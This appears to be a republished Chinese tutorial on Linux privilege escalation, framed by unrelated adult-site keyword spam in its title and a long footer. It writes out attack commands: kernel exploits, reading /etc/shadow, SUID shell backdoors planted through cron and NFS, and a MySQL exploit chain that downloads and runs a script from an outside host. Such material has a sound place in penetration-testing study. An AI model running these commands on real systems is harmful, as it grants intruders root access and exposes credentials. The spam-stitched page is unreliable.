成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Linux提權的幾種常用方式

系統 Linux
在滲透測試過程中,提升權限是非常關鍵的一步,攻擊者往往可以通過利用內核漏洞/權限配置不當/root權限運行的服務等方式尋找突破點,來達到提升權限的目的。

[[373960]]

本文轉載自微信公眾號「Bypass」,作者Bypass 。轉載本文請聯系Bypass公眾號。

在滲透測試過程中,提升權限是非常關鍵的一步,攻擊者往往可以通過利用內核漏洞/權限配置不當/root權限運行的服務等方式尋找突破點,來達到提升權限的目的。

1、內核漏洞提權

提起內核漏洞提權就不得不提到臟牛漏洞(Dirty Cow),是存在時間最長且影響范圍最廣的漏洞之一。低權限用戶可以利用該漏洞實現本地提權,同時可以通過該漏洞實現Docker容器逃逸,獲得root權限的shell。

1.1 本地內核提權

(1)檢測內核版本

  1. # 查看系統發行版本 
  2. lsb_release -a 
  3. # 查看內核版本 
  4. uname -a 

 

(2) 下載,編譯生成exp文件

  1. bypass@ubuntu:~$ make 

 

(3)執行成功,返回一個root權限的shell。

 

1.2 利用DirtyCow漏洞實現Docker逃逸

(1)進入容器,編譯POC并執行:

 

(2)在攻擊者機器上,成功接收到宿主機反彈的shell。

 

1.3 Linux提權輔助工具

github項目地址:

  1. https://github.com/mzet-/linux-exploit-suggester.git 

(1)根據操作系統版本號自動查找相應提權腳本

  1. wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh 

 

(2)根據提示下載poc,編譯執行。

 

2、利用SUID提權

SUID是一種特殊權限,可以讓調用者在執行過程中暫時獲得該文件擁有者的權限。如果可以找到并運行root用戶所擁有的SUID的文件,那么就可以在運行該文件的時候獲得root用戶權限。

(1)在Linux中查找可以用來提權的SUID文件

  1. find / -perm -u=s -type f 2>/dev/null 

 

(2)通過find以root權限執行命令

 

可用作Linux提權的命令及其姿勢:

  1. #Find 
  2. find pentestlab -exec whoami \; 
  3. #Vim 
  4. vim.tiny /etc/shadow 
  5. #awk 
  6. awk 'BEGIN{system("whoami")}' 
  7. #curl 
  8. curl file:///etc/shadow 
  9. #Bash 
  10. bash -p   
  11. #Less 
  12. less /etc/passwd 
  13. #Nmap 
  14. nmap --interactive 

3、SUDO提權

普通用戶在使用sudo執行命令的過程中,會以root方式執行命令。在很多場景里,管理員為了運維管理方便,sudoer配置文件錯誤導致提權。

(1)設置sudo免密碼

  1. $vi /etc/sudoers 
  2. 在最后一行添加:bypass ALL=(ALL:ALL) NOPASSWD:ALL 

(2)查看sudo的權限

 

4、計劃任務

如果可以找到可以有權限修改的計劃任務腳本,就可以修改腳本實現提權。本質上,就是文件權限配置不當。

(1)查看計劃任務,找到有修改權限的計劃任務腳本。

  1. ls -l /etc/cron* 
  2. more /etc/crontab 

 

(2)在mysqlback.sh 添加 SUID shell后門,當定時任務以root再次執行的時候,可以獲取root權限。

  1. cp /bin/bash /tmp/shell 
  2. chmod u+s /tmp/shell 

 

5、NFS提權

當服務器中存在NFS共享,開啟no_root_squash選項時,如果客戶端使用的是root用戶,那么對于共享目錄來說,該客戶端就有root權限,可以使用它來提升權限。

(1)查看NFS服務器上的共享目錄

  1. sudo showmount -e 10.1.1.233 

 

(2)創建本地掛載目錄,掛載共享目錄。使用攻擊者本地root權限創建Suid shell。

  1. sudo mkdir -p /tmp/data 
  2. sudo mount -t nfs 10.1.1.233:/home/bypass /tmp/data 
  3. cp /bin/bash /tmp/data/shell 
  4. chmod u+s /tmp/data/shell 

 

(3)回到要提權的服務器上,使用普通用戶使用-p參數來獲取root權限。

 

6、MySQL提權

MySQL提權方式有UDF提權,MOF提權,寫入啟動項提權等方式,但比較有意思的是CVE-2016-6663、CVE-2016-6664組合利用的提取場景,可以將一個www-data權限提升到root權限。

(1)利用CVE-2016-6663將www-data權限提升為mysql權限:

  1. cd /var/www/html/ 
  2. gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient 
  3. ./mysql-privesc-race test 123456 localhost testdb 

(2)利用CVE-2016-6664將Mysql權限提升為root權限:

  1. wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh 
  2. chmod 777 mysql-chowned.sh 
  3. ./mysql-chowned.sh /var/log/mysql/error.log 

 

責任編輯:武曉燕 來源: Bypass
相關推薦

2021-01-13 08:14:36

Windows提權漏洞攻擊

2018-07-05 10:44:09

Windows提權漏洞

2017-03-25 20:30:15

2024-07-31 08:46:10

2009-07-25 17:24:45

2024-01-15 00:25:59

2011-03-07 11:36:23

FileZillaSe

2024-07-31 08:50:20

2010-12-10 15:23:49

Linux漏洞

2022-03-10 09:41:15

漏洞Linux內核

2023-09-07 13:21:00

Linux軟件

2013-10-18 10:10:45

Linux漏洞代碼提權

2009-07-25 16:52:29

2009-09-28 10:52:33

Hibernate主鍵主鍵生成

2020-08-25 08:53:02

Linux端口轉發

2021-08-06 18:37:50

SQL表連接方式

2021-05-01 20:52:30

漏洞網絡安全網絡攻擊

2023-06-11 17:24:26

2018-07-06 13:02:23

2015-09-22 10:25:13

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 成人一区二区视频 | 亚洲精品一区在线观看 | 亚洲va欧美va人人爽午夜 | 国产精品色哟哟网站 | 黄色毛片一级 | 亚洲精品自在在线观看 | 在线观看免费国产 | 国产精品成人一区二区 | 久久久精品天堂 | 欧美精品91| 九热在线| caoporn免费在线视频 | 中文字幕一页二页 | 久久91视频| 欧美一区二区免费视频 | 国产视频黄色 | 亚洲bt 欧美bt 日本bt | 91成人小视频 | 亚洲va中文字幕 | 久久蜜桃资源一区二区老牛 | 日韩欧美国产精品 | 国产激情一区二区三区 | 国产精品视频在线观看 | 日本黄色大片免费 | 91资源在线 | 在线亚洲一区二区 | 中文字幕av网 | 亚洲一级黄色 | 国产免费一区二区三区最新6 | 一区二区三区亚洲 | 欧美成人hd | 国产特级毛片 | 久久99精品视频 | 日本一区二区三区免费观看 | 亚洲三区视频 | 午夜在线观看免费 | 天天操夜夜操 | 精品一级毛片 | 成人av观看| 一区二区中文字幕 | 精品中文字幕在线 |